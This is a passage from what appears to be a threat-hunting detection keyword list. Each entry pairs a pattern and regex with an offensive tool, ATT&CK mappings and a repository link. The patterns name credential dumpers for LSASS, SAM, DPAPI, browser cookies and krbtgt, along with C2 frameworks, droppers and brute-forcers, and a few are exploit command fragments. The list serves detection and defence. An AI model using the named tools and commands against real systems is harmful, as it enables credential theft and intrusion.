browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*droopescan scan drupal -u * -t 32*",".{0,1000}droopescan\sscan\sdrupal\s\-u\s.{0,1000}\s\-t\s32.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Droopscan*",".{0,1000}Droopscan.{0,1000}","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","N/A","Web Attacks","https://github.com/droope/droopescan","1","0","N/A","N/A","10","1192","244","2024-01-19T19:58:03Z","2014-10-22T22:06:30Z" "*drop_malleable_unknown_*",".{0,1000}drop_malleable_unknown_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*drop_malleable_with_invalid_*",".{0,1000}drop_malleable_with_invalid_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*drop_malleable_without_*",".{0,1000}drop_malleable_without_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dropboxC2.py*",".{0,1000}dropboxC2\.py.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dropper_cs.exe*",".{0,1000}dropper_cs\.exe.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*dropper32.exe*",".{0,1000}dropper32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*dropper64.exe*",".{0,1000}dropper64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*drops a netcat?? undetectable by antivirus*",".{0,1000}drops\sa\snetcat\?\?\sundetectable\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*drunkpotato.x64.dll*",".{0,1000}drunkpotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*drunkpotato.x86.dll*",".{0,1000}drunkpotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*drupal_enum.py*",".{0,1000}drupal_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*drupwn --mode exploit --target *",".{0,1000}drupwn\s\-\-mode\sexploit\s\-\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did.onion*",".{0,1000}dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*DSInternals_v4.*.zip*",".{0,1000}DSInternals_v4\..{0,1000}\.zip.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*dswmiexec.exe*",".{0,1000}dswmiexec\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*dtd-finder*",".{0,1000}dtd\-finder.{0,1000}","offensive_tool_keyword","dtd-finder","Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.","T1221 - T1228 - T1547","TA0005 - ","N/A","N/A","Exploitation tools","https://github.com/GoSecure/dtd-finder","1","0","N/A","N/A","6","582","104","2024-02-21T00:00:00Z","2019-07-15T20:13:54Z" "*dtmsecurity/bof_helper*",".{0,1000}dtmsecurity\/bof_helper.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","210","46","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" "*dubmoat*",".{0,1000}dubmoat.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_ExtractData*",".{0,1000}Dubmoat_ExtractData.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_PrintFilename*",".{0,1000}Dubmoat_PrintFilename.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_TruncateFile*",".{0,1000}Dubmoat_TruncateFile.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*DuBrute v*",".{0,1000}DuBrute\sv.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*dubrute.exe*",".{0,1000}dubrute\.exe.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*DUBrute_v*",".{0,1000}DUBrute_v.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*DuckDuckC2-main*",".{0,1000}DuckDuckC2\-main.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*ducky_keyboard_sender(scancode*",".{0,1000}ducky_keyboard_sender\(scancode.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*DueDLLigence.cs*",".{0,1000}DueDLLigence\.cs.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*DueDLLigence.sln*",".{0,1000}DueDLLigence\.sln.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*DueDLLigence-master*",".{0,1000}DueDLLigence\-master.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*dump /service:krbtgt *",".{0,1000}dump\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Dump AAD connect account credential in current context*",".{0,1000}Dump\sAAD\sconnect\saccount\scredential\sin\scurrent\scontext.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*Dump AD Certificate Services data*",".{0,1000}Dump\sAD\sCertificate\sServices\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Dump AD Integrated DNS data*",".{0,1000}Dump\sAD\sIntegrated\sDNS\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Dump cookies from Chrome or Edge*",".{0,1000}Dump\scookies\sfrom\sChrome\sor\sEdge.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*Dump looted SCCM secrets to specified directory*",".{0,1000}Dump\slooted\sSCCM\ssecrets\sto\sspecified\sdirectory.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*Dump SCCM secrets from WMI requests results*",".{0,1000}Dump\sSCCM\ssecrets\sfrom\sWMI\srequests\sresults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dump_chrome_user*",".{0,1000}dump_chrome_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_CREDENTIAL_MSOFFICE*",".{0,1000}dump_CREDENTIAL_MSOFFICE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_CREDENTIAL_TASKSCHEDULER*",".{0,1000}dump_CREDENTIAL_TASKSCHEDULER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_CREDENTIAL_TSE*",".{0,1000}dump_CREDENTIAL_TSE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_domain*",".{0,1000}dump_domain.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*dump_exported_functions(library,dll_orig)*",".{0,1000}dump_exported_functions\(library,dll_orig\).{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*dump_firefox_user*",".{0,1000}dump_firefox_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_google_password()*",".{0,1000}dump_google_password\(\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*dump_jenkins*",".{0,1000}dump_jenkins.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_keepassx*",".{0,1000}dump_keepassx.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_lsass*",".{0,1000}dump_lsass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*dump_lsass.js*",".{0,1000}dump_lsass\.js.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*dump_process(*lsass.exe*)*",".{0,1000}dump_process\(.{0,1000}lsass\.exe.{0,1000}\).{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*dump_sam(*",".{0,1000}dump_sam\(.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 